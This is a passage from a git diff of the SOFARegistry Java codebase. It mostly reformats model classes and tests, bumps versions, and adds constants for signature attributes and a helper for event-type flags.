a/client/log/src/test/java/com/alipay/sofa/registry/client/log/LoggerFactoryTest.java b/client/log/src/test/java/com/alipay/sofa/registry/client/log/LoggerFactoryTest.java index 208cb3dbf..0d1848ade 100644 --- a/client/log/src/test/java/com/alipay/sofa/registry/client/log/LoggerFactoryTest.java +++ b/client/log/src/test/java/com/alipay/sofa/registry/client/log/LoggerFactoryTest.java @@ -19,46 +19,43 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class LoggerFactoryTest { - @Test - public void getLogger() { - Assert.assertNull(LoggerFactory.getLogger((String) null)); - Assert.assertNull(LoggerFactory.getLogger((Class) null)); - Assert.assertEquals(LoggerFactory.getLogger(LoggerFactoryTest.class), - LoggerFactory.getLogger(LoggerFactoryTest.class.getCanonicalName())); - - } - - @Test - public void getLogSpace() { - Assert.assertEquals("com.alipay.sofa.registry.client", LoggerFactory.getLogSpace()); - String key = "registry.client.log.space"; - String old = System.getProperty(key); // - try { - System.setProperty(key, "xxx"); - Assert.assertEquals("xxx", LoggerFactory.getLogSpace()); - } finally { - if (old == null) { - System.clearProperty(key); - } else { - System.setProperty(key, old); - } - } - Assert.assertEquals("com.alipay.sofa.registry.client", LoggerFactory.getLogSpace()); - } + @Test + public void getLogger() { + Assert.assertNull(LoggerFactory.getLogger((String) null)); + Assert.assertNull(LoggerFactory.getLogger((Class) null)); + Assert.assertEquals( + LoggerFactory.getLogger(LoggerFactoryTest.class), + LoggerFactory.getLogger(LoggerFactoryTest.class.getCanonicalName())); + } - @Test - public void testIsBlank() { - Assert.assertFalse(LoggerFactory.isBlank("123")); - Assert.assertTrue(LoggerFactory.isBlank(" ")); - Assert.assertTrue(LoggerFactory.isBlank("")); - Assert.assertTrue(LoggerFactory.isBlank(null)); - Assert.assertTrue(LoggerFactory.isBlank(" ")); - Assert.assertTrue(LoggerFactory.isBlank("\r\t")); + @Test + public void getLogSpace() { + Assert.assertEquals("com.alipay.sofa.registry.client", LoggerFactory.getLogSpace()); + String key = "registry.client.log.space"; + String old = System.getProperty(key); // + try { + System.setProperty(key, "xxx"); + Assert.assertEquals("xxx", LoggerFactory.getLogSpace()); + } finally { + if (old == null) { + System.clearProperty(key); + } else { + System.setProperty(key, old); + } } + Assert.assertEquals("com.alipay.sofa.registry.client", LoggerFactory.getLogSpace()); + } -} \ No newline at end of file + @Test + public void testIsBlank() { + Assert.assertFalse(LoggerFactory.isBlank("123")); + Assert.assertTrue(LoggerFactory.isBlank(" ")); + Assert.assertTrue(LoggerFactory.isBlank("")); + Assert.assertTrue(LoggerFactory.isBlank(null)); + Assert.assertTrue(LoggerFactory.isBlank(" ")); + Assert.assertTrue(LoggerFactory.isBlank("\r\t")); + } +} diff --git a/client/pom.xml b/client/pom.xml index ea36b1f84..f4eb6cbc9 100644 --- a/client/pom.xml +++ b/client/pom.xml @@ -7,7 +7,7 @@ com.alipay.sofa registry-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml @@ -30,13 +30,13 @@ - true + false true true 1.6 1.6 UTF-8 - 1.4.6 + 1.6.2 ../ diff --git a/core/pom.xml b/core/pom.xml index e01707058..9d47f61e4 100644 --- a/core/pom.xml +++ b/core/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/core/src/main/java/com/alipay/sofa/registry/core/constants/AttributeKeyConstants.java b/core/src/main/java/com/alipay/sofa/registry/core/constants/AttributeKeyConstants.java new file mode 100644 index 000000000..36495d7fb --- /dev/null +++ b/core/src/main/java/com/alipay/sofa/registry/core/constants/AttributeKeyConstants.java @@ -0,0 +1,33 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.core.constants; + +/** + * @author zhuoyu.sjw + * @version $Id: AttributeKeyConstants.java, v 0.1 2018-03-30 20:18 zhuoyu.sjw Exp $$ + */ +public class AttributeKeyConstants { + + /** Access Key */ + public static final String ATTRIBUTE_ACCESS_KEY = "!AccessKey"; + /** Algorithm Key */ + public static final String ATTRIBUTE_ALGORITHM = "!Algorithm"; + /** Signature Key */ + public static final String ATTRIBUTE_SIGNATURE = "!Signature"; + /** Timestamp Key */ + public static final String ATTRIBUTE_TIMESTAMP = "!Timestamp"; +} diff --git a/core/src/main/java/com/alipay/sofa/registry/core/constants/EventTypeConstants.java b/core/src/main/java/com/alipay/sofa/registry/core/constants/EventTypeConstants.java index 2539da47e..b1f3c6713 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/constants/EventTypeConstants.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/constants/EventTypeConstants.java @@ -17,13 +17,22 @@ package com.alipay.sofa.registry.core.constants; /** - * * @author zhuoyu.sjw * @version $Id: EventTypeConstants.java, v 0.1 2018-03-01 19:15 zhuoyu.sjw Exp $$ */ -public class EventTypeConstants { +public final class EventTypeConstants { + private EventTypeConstants() {} + + public static final String REGISTER = "REGISTER"; - public static final String REGISTER = "REGISTER"; + public static final String UNREGISTER = "UNREGISTER"; - public static final String UNREGISTER = "UNREGISTER"; + public static char getEventTypeFlag(String eventType) { + if (EventTypeConstants.REGISTER.equals(eventType)) { + return 'R'; + } else if (EventTypeConstants.UNREGISTER.equals(eventType)) { + return 'U'; + } + return 'N'; + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/AppRevisionInterface.java b/core/src/main/java/com/alipay/sofa/registry/core/model/AppRevisionInterface.java new file mode 100644 index 000000000..3b8efdb7c --- /dev/null +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/AppRevisionInterface.java @@ -0,0 +1,65 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.core.model; + +import java.io.Serializable; +import java.util.HashMap; +import java.util.List; +import java.util.Map; + +public class AppRevisionInterface implements Serializable { + + private String id; + + private Map> serviceParams = new HashMap>(); + + /** + * Getter method for property id. + * + * @return property value of id + */ + public String getId() { + return id; + } + + /** + * Setter method for property id. + * + * @param id value to be assigned to property id + */ + public void setId(String id) { + this.id = id; + } + + /** + * Getter method for property serviceParams. + * + * @return property value of serviceParams + */ + public Map> getServiceParams() { + return serviceParams; + } + + /** + * Setter method for property serviceParams. + * + * @param serviceParams value to be assigned to property serviceParams + */ + public void setServiceParams(Map> serviceParams) { + this.serviceParams = serviceParams; + } +} diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/BaseRegister.java b/core/src/main/java/com/alipay/sofa/registry/core/model/BaseRegister.java index fe5a6c5ad..7b8d4a11a 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/BaseRegister.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/BaseRegister.java @@ -21,327 +21,365 @@ import java.util.Map; /** - * * @author zhuoyu.sjw * @version $Id: BaseRegister.java, v 0.1 2017-11-28 14:32 zhuoyu.sjw Exp $$ */ public class BaseRegister implements Serializable { - private static final long serialVersionUID = -3825175839851738346L; - - private String instanceId; - - private String zone; - - private String appName; - - private String dataId; - - private String group; - - private String processId; - - private String registId; - - private String clientId; - - private String dataInfoId; - - private String ip; - - private Integer port; - - private String eventType; - - private Long version; - - private Long timestamp; - - private Map attributes = new HashMap(); - - /** - * Getter method for property instanceId. - * - * @return property value of instanceId - */ - public String getInstanceId() { - return instanceId; - } - - /** - * Setter method for property instanceId. - * - * @param instanceId value to be assigned to property instanceId - */ - public void setInstanceId(String instanceId) { - this.instanceId = instanceId; - } - - /** - * Getter method for property zone. - * - * @return property value of zone - */ - public String getZone() { - return zone; - } - - /** - * Setter method for property zone. - * - * @param zone value to be assigned to property zone - */ - public void setZone(String zone) { - this.zone = zone; - } - - /** - * Getter method for property appName. - * - * @return property value of appName - */ - public String getAppName() { - return appName; - } - - /** - * Setter method for property appName. - * - * @param appName value to be assigned to property appName - */ - public void setAppName(String appName) { - this.appName = appName; - } - - /** - * Getter method for property dataId. - * - * @return property value of dataId - */ - public String getDataId() { - return dataId; - } - - /** - * Setter method for property dataId. - * - * @param dataId value to be assigned to property dataId - */ - public void setDataId(String dataId) { - this.dataId = dataId; - } - - /** - * Getter method for property group. - * - * @return property value of group - */ - public String getGroup() { - return group; - } - - /** - * Setter method for property group. - * - * @param group value to be assigned to property group - */ - public void setGroup(String group) { - this.group = group; - } - - /** - * Getter method for property processId. - * - * @return property value of processId - */ - public String getProcessId() { - return processId; - } - - /** - * Setter method for property processId. - * - * @param processId value to be assigned to property processId - */ - public void setProcessId(String processId) { - this.processId = processId; - } - - /** - * Getter method for property registId. - * - * @return property value of registId - */ - public String getRegistId() { - return registId; - } - - /** - * Setter method for property registId. - * - * @param registId value to be assigned to property registId - */ - public void setRegistId(String registId) { - this.registId = registId; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } - - /** - * Getter method for property timestamp. - * - * @return property value of timestamp - */ - public Long getTimestamp() { - return timestamp; - } - - /** - * Setter method for property timestamp. - * - * @param timestamp value to be assigned to property timestamp - */ - public void setTimestamp(Long timestamp) { - this.timestamp = timestamp; - } - - /** - * Getter method for property eventType. - * - * @return property value of eventType - */ - public String getEventType() { - return eventType; - } - - /** - * Setter method for property eventType. - * - * @param eventType value to be assigned to property eventType - */ - public void setEventType(String eventType) { - this.eventType = eventType; - } - - /** - * Getter method for property clientId. - * - * @return property value of clientId - */ - public String getClientId() { - return clientId; - } - - /** - * Setter method for property clientId. - * - * @param clientId value to be assigned to property clientId - */ - public void setClientId(String clientId) { - this.clientId = clientId; - } - - /** - * Getter method for property ip. - * - * @return property value of ip - */ - public String getIp() { - return ip; - } - - /** - * Setter method for property ip. - * - * @param ip value to be assigned to property ip - */ - public void setIp(String ip) { - this.ip = ip; - } - - /** - * Getter method for property port. - * - * @return property value of port - */ - public Integer getPort() { - return port; - } - - /** - * Setter method for property port. - * - * @param port value to be assigned to property port - */ - public void setPort(Integer port) { - this.port = port; - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = dataInfoId; - } - - /** - * Getter method for property attributes. - * - * @return property value of attributes - */ - public Map getAttributes() { - return attributes; - } - - /** - * Setter method for property attributes. - * - * @param attributes value to be assigned to property attributes - */ - public void setAttributes(Map attributes) { - this.attributes = attributes; - } - - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "BaseRegister{" + "instanceId='" + instanceId + '\'' + ", zone='" + zone + '\'' - + ", appName='" + appName + '\'' + ", dataId='" + dataId + '\'' + ", group='" - + group + '\'' + ", processId='" + processId + '\'' + ", registId='" + registId - + '\'' + ", clientId='" + clientId + '\'' + ", dataInfoId='" + dataInfoId + '\'' - + ", ip='" + ip + '\'' + ", port=" + port + ", eventType='" + eventType + '\'' - + ", version=" + version + ", timestamp=" + timestamp + ", attributes=" + attributes - + '}'; + private static final long serialVersionUID = -3825175839851738346L; + + private String instanceId; + + private String zone; + + private String appName; + + private String dataId; + + private String group; + + private String processId; + + private String registId; + + private String clientId; + + private String dataInfoId; + + private String ip; + + private Integer port; + + private String eventType; + + private Long version; + + private Long timestamp; + + private volatile Map attributes; + + /** + * Getter method for property instanceId. + * + * @return property value of instanceId + */ + public String getInstanceId() { + return instanceId; + } + + /** + * Setter method for property instanceId. + * + * @param instanceId value to be assigned to property instanceId + */ + public void setInstanceId(String instanceId) { + this.instanceId = instanceId; + } + + /** + * Getter method for property zone. + * + * @return property value of zone + */ + public String getZone() { + return zone; + } + + /** + * Setter method for property zone. + * + * @param zone value to be assigned to property zone + */ + public void setZone(String zone) { + this.zone = zone; + } + + /** + * Getter method for property appName. + * + * @return property value of appName + */ + public String getAppName() { + return appName; + } + + /** + * Setter method for property appName. + * + * @param appName value to be assigned to property appName + */ + public void setAppName(String appName) { + this.appName = appName; + } + + /** + * Getter method for property dataId. + * + * @return property value of dataId + */ + public String getDataId() { + return dataId; + } + + /** + * Setter method for property dataId. + * + * @param dataId value to be assigned to property dataId + */ + public void setDataId(String dataId) { + this.dataId = dataId; + } + + /** + * Getter method for property group. + * + * @return property value of group + */ + public String getGroup() { + return group; + } + + /** + * Setter method for property group. + * + * @param group value to be assigned to property group + */ + public void setGroup(String group) { + this.group = group; + } + + /** + * Getter method for property processId. + * + * @return property value of processId + */ + public String getProcessId() { + return processId; + } + + /** + * Setter method for property processId. + * + * @param processId value to be assigned to property processId + */ + public void setProcessId(String processId) { + this.processId = processId; + } + + /** + * Getter method for property registId. + * + * @return property value of registId + */ + public String getRegistId() { + return registId; + } + + /** + * Setter method for property registId. + * + * @param registId value to be assigned to property registId + */ + public void setRegistId(String registId) { + this.registId = registId; + } + + /** + * Getter method for property version. + * + * @return property value of version + */ + public Long getVersion() { + return version; + } + + /** + * Setter method for property version. + * + * @param version value to be assigned to property version + */ + public void setVersion(Long version) { + this.version = version; + } + + /** + * Getter method for property timestamp. + * + * @return property value of timestamp + */ + public Long getTimestamp() { + return timestamp; + } + + /** + * Setter method for property timestamp. + * + * @param timestamp value to be assigned to property timestamp + */ + public void setTimestamp(Long timestamp) { + this.timestamp = timestamp; + } + + /** + * Getter method for property eventType. + * + * @return property value of eventType + */ + public String getEventType() { + return eventType; + } + + /** + * Setter method for property eventType. + * + * @param eventType value to be assigned to property eventType + */ + public void setEventType(String eventType) { + this.eventType = eventType; + } + + /** + * Getter method for property clientId. + * + * @return property value of clientId + */ + public String getClientId() { + return clientId; + } + + /** + * Setter method for property clientId. + * + * @param clientId value to be assigned to property clientId + */ + public void setClientId(String clientId) { + this.clientId = clientId; + } + + /** + * Getter method for property ip. + * + * @return property value of ip + */ + public String getIp() { + return ip; + } + + /** + * Setter method for property ip. + * + * @param ip value to be assigned to property ip + */ + public void setIp(String ip) { + this.ip = ip; + } + + /** + * Getter method for property port. + * + * @return property value of port + */ + public Integer getPort() { + return port; + } + + /** + * Setter method for property port. + * + * @param port value to be assigned to property port + */ + public void setPort(Integer port) { + this.port = port; + } + + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } + + /** + * Setter method for property dataInfoId. + * + * @param dataInfoId value to be assigned to property dataInfoId + */ + public void setDataInfoId(String dataInfoId) { + this.dataInfoId = dataInfoId; + } + + /** + * Getter method for property attributes. + * + * @return property value of attributes + */ + public synchronized Map getAttributes() { + if (this.attributes == null) { + this.attributes = new HashMap(); } + return attributes; + } + + /** + * Setter method for property attributes. + * + * @param attributes value to be assigned to property attributes + */ + public synchronized void setAttributes(Map attributes) { + this.attributes = attributes; + } + + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "BaseRegister{" + + "instanceId='" + + instanceId + + '\'' + + ", zone='" + + zone + + '\'' + + ", appName='" + + appName + + '\'' + + ", dataId='" + + dataId + + '\'' + + ", group='" + + group + + '\'' + + ", processId='" + + processId + + '\'' + + ", registId='" + + registId + + '\'' + + ", clientId='" + + clientId + + '\'' + + ", dataInfoId='" + + dataInfoId + + '\'' + + ", ip='" + + ip + + '\'' + + ", port=" + + port + + ", eventType='" + + eventType + + '\'' + + ", version=" + + version + + ", timestamp=" + + timestamp + + ", attributes=" + + attributes + + '}'; + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/ConfiguratorRegister.java b/core/src/main/java/com/alipay/sofa/registry/core/model/ConfiguratorRegister.java index 0c2f33af7..a48053d2e 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/ConfiguratorRegister.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/ConfiguratorRegister.java @@ -17,11 +17,9 @@ package com.alipay.sofa.registry.core.model; /** - * * @author zhuoyu.sjw * @version $Id: ConfiguratorRegister.java, v 0.1 2018-04-17 17:45 zhuoyu.sjw Exp $$ */ public class ConfiguratorRegister extends BaseRegister { - private static final long serialVersionUID = 3636660681387698721L; - + private static final long serialVersionUID = 3636660681387698721L; } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/DataBox.java b/core/src/main/java/com/alipay/sofa/registry/core/model/DataBox.java index 98dd01ad7..ef0a70aff 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/DataBox.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/DataBox.java @@ -20,52 +20,50 @@ /** * The type DataBox. + * * @author zhuoyu.sjw * @version $Id : DataBox.java, v 0.1 2017-11-28 17:47 zhuoyu.sjw Exp $$ */ public class DataBox implements Serializable { - /** UID */ - private static final long serialVersionUID = 2817539491173993030L; + /** UID */ + private static final long serialVersionUID = 2817539491173993030L; - /** Actual data */ - private String data; + /** Actual data */ + private String data; - /** - * Instantiates a new DataBox. - */ - public DataBox() { - } + /** Instantiates a new DataBox. */ + public DataBox() {} - /** - * Instantiates a new Data box. - * - * @param data the data - */ - public DataBox(String data) { - this.data = data; - } + /** + * Instantiates a new Data box. + * + * @param data the data + */ + public DataBox(String data) { + this.data = data; + } - /** - * Getter method for property data. - * - * @return property value of data - */ - public String getData() { - return data; - } + /** + * Getter method for property data. + * + * @return property value of data + */ + public String getData() { + return data; + } - /** - * Setter method for property data. - * - * @param data value to be assigned to property data - */ - public void setData(String data) { - this.data = data; - } + /** + * Setter method for property data. + * + * @param data value to be assigned to property data + */ + public void setData(String data) { + this.data = data; + } - @Override - public String toString() { - return "DataBox{data='" + data + "'}"; - } + @Override + public String toString() { + return "DataBox{data='" + data + "'}"; + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/PublisherRegister.java b/core/src/main/java/com/alipay/sofa/registry/core/model/PublisherRegister.java index 7bdc25015..346836934 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/PublisherRegister.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/PublisherRegister.java @@ -20,40 +20,41 @@ /** * The type Publisher register. + * * @author zhuoyu.sjw * @version $Id : PublisherRegister.java, v 0.1 2017-11-28 15:39 zhuoyu.sjw Exp $$ */ public class PublisherRegister extends BaseRegister { - private static final long serialVersionUID = 17084511452627565L; + private static final long serialVersionUID = 17084511452627565L; - private List dataList; + private List dataList; - /** - * Getter method for property dataList. - * - * @return property value of dataList - */ - public List getDataList() { - return dataList; - } + /** + * Getter method for property dataList. + * + * @return property value of dataList + */ + public List getDataList() { + return dataList; + } - /** - * Setter method for property dataList. - * - * @param dataList value to be assigned to property dataList - */ - public void setDataList(List dataList) { - this.dataList = dataList; - } + /** + * Setter method for property dataList. + * + * @param dataList value to be assigned to property dataList + */ + public void setDataList(List dataList) { + this.dataList = dataList; + } - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "PublisherRegister{" + "dataList=" + dataList + '}' + super.toString(); - } + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "PublisherRegister{" + "dataList=" + dataList + '}' + super.toString(); + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/ReceivedConfigData.java b/core/src/main/java/com/alipay/sofa/registry/core/model/ReceivedConfigData.java index a7c1e182c..e85ddeb13 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/ReceivedConfigData.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/ReceivedConfigData.java @@ -21,140 +21,153 @@ /** * The type Received config data. + * * @author zhuoyu.sjw * @version $Id : ReceivedConfigData.java, v 0.1 2018-04-17 18:00 zhuoyu.sjw Exp $$ */ public class ReceivedConfigData implements Serializable { - private static final long serialVersionUID = 4077554672965455808L; - - private String dataId; - - private String group; - - private String instanceId; - - private List configuratorRegistIds; - - private DataBox dataBox; - - private Long version; - - /** - * Getter method for property dataId. - * - * @return property value of dataId - */ - public String getDataId() { - return dataId; - } - - /** - * Setter method for property dataId. - * - * @param dataId value to be assigned to property dataId - */ - public void setDataId(String dataId) { - this.dataId = dataId; - } - - /** - * Getter method for property group. - * - * @return property value of group - */ - public String getGroup() { - return group; - } - - /** - * Setter method for property group. - * - * @param group value to be assigned to property group - */ - public void setGroup(String group) { - this.group = group; - } - - /** - * Getter method for property instanceId. - * - * @return property value of instanceId - */ - public String getInstanceId() { - return instanceId; - } - - /** - * Setter method for property instanceId. - * - * @param instanceId value to be assigned to property instanceId - */ - public void setInstanceId(String instanceId) { - this.instanceId = instanceId; - } - - /** - * Getter method for property dataBox. - * - * @return property value of dataBox - */ - public DataBox getDataBox() { - return dataBox; - } - - /** - * Setter method for property dataBox. - * - * @param dataBox value to be assigned to property dataBox - */ - public void setDataBox(DataBox dataBox) { - this.dataBox = dataBox; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } - - /** - * Getter method for property configuratorRegistIds. - * - * @return property value of configuratorRegistIds - */ - public List getConfiguratorRegistIds() { - return configuratorRegistIds; - } - - /** - * Setter method for property configuratorRegistIds. - * - * @param configuratorRegistIds value to be assigned to property configuratorRegistIds - */ - public void setConfiguratorRegistIds(List configuratorRegistIds) { - this.configuratorRegistIds = configuratorRegistIds; - } - - /** - * @see Object#toString() - */ - @Override - public String toString() { - return "ReceivedConfigData{" + "dataId='" + dataId + '\'' + ", group='" + group + '\'' - + ", instanceId='" + instanceId + '\'' + ", configuratorRegistIds=" - + configuratorRegistIds + ", dataBox=" + dataBox + ", version=" + version + '}'; - } + private static final long serialVersionUID = 4077554672965455808L; + + private String dataId; + + private String group; + + private String instanceId; + + private List configuratorRegistIds; + + private DataBox dataBox; + + private Long version; + + /** + * Getter method for property dataId. + * + * @return property value of dataId + */ + public String getDataId() { + return dataId; + } + + /** + * Setter method for property dataId. + * + * @param dataId value to be assigned to property dataId + */ + public void setDataId(String dataId) { + this.dataId = dataId; + } + + /** + * Getter method for property group. + * + * @return property value of group + */ + public String getGroup() { + return group; + } + + /** + * Setter method for property group. + * + * @param group value to be assigned to property group + */ + public void setGroup(String group) { + this.group = group; + } + + /** + * Getter method for property instanceId. + * + * @return property value of instanceId + */ + public String getInstanceId() { + return instanceId; + } + + /** + * Setter method for property instanceId. + * + * @param instanceId value to be assigned to property instanceId + */ + public void setInstanceId(String instanceId) { + this.instanceId = instanceId; + } + + /** + * Getter method for property dataBox. + * + * @return property value of dataBox + */ + public DataBox getDataBox() { + return dataBox; + } + + /** + * Setter method for property dataBox. + * + * @param dataBox value to be assigned to property dataBox + */ + public void setDataBox(DataBox dataBox) { + this.dataBox = dataBox; + } + + /** + * Getter method for property version. + * + * @return property value of version + */ + public Long getVersion() { + return version; + } + + /** + * Setter method for property version. + * + * @param version value to be assigned to property version + */ + public void setVersion(Long version) { + this.version = version; + } + + /** + * Getter method for property configuratorRegistIds. + * + * @return property value of configuratorRegistIds + */ + public List getConfiguratorRegistIds() { + return configuratorRegistIds; + } + + /** + * Setter method for property configuratorRegistIds. + * + * @param configuratorRegistIds value to be assigned to property configuratorRegistIds + */ + public void setConfiguratorRegistIds(List configuratorRegistIds) { + this.configuratorRegistIds = configuratorRegistIds; + } + + /** @see Object#toString() */ + @Override + public String toString() { + return "ReceivedConfigData{" + + "dataId='" + + dataId + + '\'' + + ", group='" + + group + + '\'' + + ", instanceId='" + + instanceId + + '\'' + + ", configuratorRegistIds=" + + configuratorRegistIds + + ", dataBox=" + + dataBox + + ", version=" + + version + + '}'; + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/ReceivedData.java b/core/src/main/java/com/alipay/sofa/registry/core/model/ReceivedData.java index f4ef744c5..139a5084b 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/ReceivedData.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/ReceivedData.java @@ -22,232 +22,255 @@ /** * The type Received data multi. + * * @author zhuoyu.sjw * @version $Id : ReceivedData.java, v 0.1 2017-11-23 22:23 zhuoyu.sjw Exp $$ */ public class ReceivedData implements Serializable { - private static final long serialVersionUID = -7322781873212812819L; - - private String dataId; - - private String group; - - private String instanceId; - - private String segment; - - private String scope; - - private List subscriberRegistIds; - - private Map> data; - - private Long version; - - private String localZone; - - /** - * Instantiates a new Received data multi. - */ - public ReceivedData() { - } - - /** - * Instantiates a new Received data multi. - * - * @param dataId the data id - * @param group the group - * @param instanceId the instance id - * @param segment the data center - * @param subscriberRegistIds the subscriber regist ids - * @param data the data - * @param version the version - */ - public ReceivedData(String dataId, String group, String instanceId, String segment, - List subscriberRegistIds, Map> data, - Long version) { - this.dataId = dataId; - this.group = group; - this.instanceId = instanceId; - this.segment = segment; - this.subscriberRegistIds = subscriberRegistIds; - this.data = data; - this.version = version; - } - - /** - * Getter method for property dataId. - * - * @return property value of dataId - */ - public String getDataId() { - return dataId; - } - - /** - * Setter method for property dataId. - * - * @param dataId value to be assigned to property dataId - */ - public void setDataId(String dataId) { - this.dataId = dataId; - } - - /** - * Getter method for property group. - * - * @return property value of group - */ - public String getGroup() { - return group; - } - - /** - * Setter method for property group. - * - * @param group value to be assigned to property group - */ - public void setGroup(String group) { - this.group = group; - } - - /** - * Getter method for property instanceId. - * - * @return property value of instanceId - */ - public String getInstanceId() { - return instanceId; - } - - /** - * Setter method for property instanceId. - * - * @param instanceId value to be assigned to property instanceId - */ - public void setInstanceId(String instanceId) { - this.instanceId = instanceId; - } - - /** - * Getter method for property segment. - * - * @return property value of segment - */ - public String getSegment() { - return segment; - } - - /** - * Setter method for property segment. - * - * @param segment value to be assigned to property segment - */ - public void setSegment(String segment) { - this.segment = segment; - } - - /** - * Getter method for property scope. - * - * @return property value of scope - */ - public String getScope() { - return scope; - } - - /** - * Setter method for property scope. - * - * @param scope value to be assigned to property scope - */ - public void setScope(String scope) { - this.scope = scope; - } - - /** - * Getter method for property subscriberRegistIds. - * - * @return property value of subscriberRegistIds - */ - public List getSubscriberRegistIds() { - return subscriberRegistIds; - } - - /** - * Setter method for property subscriberRegistIds. - * - * @param subscriberRegistIds value to be assigned to property subscriberRegistIds - */ - public void setSubscriberRegistIds(List subscriberRegistIds) { - this.subscriberRegistIds = subscriberRegistIds; - } - - /** - * Getter method for property data. - * - * @return property value of data - */ - public Map> getData() { - return data; - } - - /** - * Setter method for property data. - * - * @param data value to be assigned to property data - */ - public void setData(Map> data) { - this.data = data; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } - - /** - * Getter method for property localZone. - * - * @return property value of localZone - */ - public String getLocalZone() { - return localZone; - } - - /** - * Setter method for property localZone. - * - * @param localZone value to be assigned to property localZone - */ - public void setLocalZone(String localZone) { - this.localZone = localZone; - } - - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "ReceivedData{" + "dataId='" + dataId + '\'' + ", group='" + group + '\'' - + ", instanceId='" + instanceId + '\'' + ", segment='" + segment + '\'' - + ", scope='" + scope + '\'' + ", subscriberRegistIds=" + subscriberRegistIds - + ", version=" + version + ", localZone='" + localZone + '\'' + '}'; - } + private static final long serialVersionUID = -7322781873212812819L; + + private String dataId; + + private String group; + + private String instanceId; + + private String segment; + + private String scope; + + private List subscriberRegistIds; + + private Map> data; + + private Long version; + + private String localZone; + + /** Instantiates a new Received data multi. */ + public ReceivedData() {} + + /** + * Instantiates a new Received data multi. + * + * @param dataId the data id + * @param group the group + * @param instanceId the instance id + * @param segment the data center + * @param subscriberRegistIds the subscriber regist ids + * @param data the data + * @param version the version + */ + public ReceivedData( + String dataId, + String group, + String instanceId, + String segment, + List subscriberRegistIds, + Map> data, + Long version) { + this.dataId = dataId; + this.group = group; + this.instanceId = instanceId; + this.segment = segment; + this.subscriberRegistIds = subscriberRegistIds; + this.data = data; + this.version = version; + } + + /** + * Getter method for property dataId. + * + * @return property value of dataId + */ + public String getDataId() { + return dataId; + } + + /** + * Setter method for property dataId. + * + * @param dataId value to be assigned to property dataId + */ + public void setDataId(String dataId) { + this.dataId = dataId; + } + + /** + * Getter method for property group. + * + * @return property value of group + */ + public String getGroup() { + return group; + } + + /** + * Setter method for property group. + * + * @param group value to be assigned to property group + */ + public void setGroup(String group) { + this.group = group; + } + + /** + * Getter method for property instanceId. + * + * @return property value of instanceId + */ + public String getInstanceId() { + return instanceId; + } + + /** + * Setter method for property instanceId. + * + * @param instanceId value to be assigned to property instanceId + */ + public void setInstanceId(String instanceId) { + this.instanceId = instanceId; + } + + /** + * Getter method for property segment. + * + * @return property value of segment + */ + public String getSegment() { + return segment; + } + + /** + * Setter method for property segment. + * + * @param segment value to be assigned to property segment + */ + public void setSegment(String segment) { + this.segment = segment; + } + + /** + * Getter 